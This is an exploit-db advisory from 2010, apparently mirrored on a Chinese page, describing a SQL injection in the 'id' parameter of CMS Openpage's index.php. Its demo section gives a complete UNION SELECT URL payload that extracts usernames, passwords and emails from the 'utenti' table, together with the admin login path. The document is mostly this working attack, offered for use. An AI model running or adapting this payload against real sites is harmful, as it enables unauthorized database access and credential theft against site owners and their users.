CMS Openpage – ‘index.php’ SQL Injection

• Exploit Database
• 8 阅读

• 作者： Phenom
  日期： 2010-03-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11836/

• ====================================================
  CMS Openpage (index.php) SQL Injection Vulnerability
  ====================================================
  
  [+] Discovered by: Phenom
  [+] My id: http://inj3ct0r.com/author/2157
  [+] Original: http://inj3ct0r.com/exploits/9666
  
  # Exploit Title: CMS Openpage (index.php) SQL Injection Vulnerability
  # Tested on: windows xp sp3
  # Code :
  
  >>[Author] = Phenom
  
  >>[CMS] = CMS Openpage
  
  >>[Dork] = I hate script kiddies
  
  >>[Date] = 2010-03-22
  
  
  >>[Exploit] :
  
  [Bug] = [index.php?pagina=news&id=]
  
  [Usage] = http://www.site/index.php?pagina=news&id=[SQL Injection]
  
  [Login] = http://site/index_priv.php
  
  
  >>[Demo] :
  
  [+] http://[site]/index.php?pagina=news&id=-5+union+select+1,group_concat%28concat%28username,0x3a,password,0x3a,email%29%20separator%200x3c62723e%29,3,4,5,6,7,8,9,10+from+utenti--
  
  
  # Inj3ct0r.com [2010-03-22]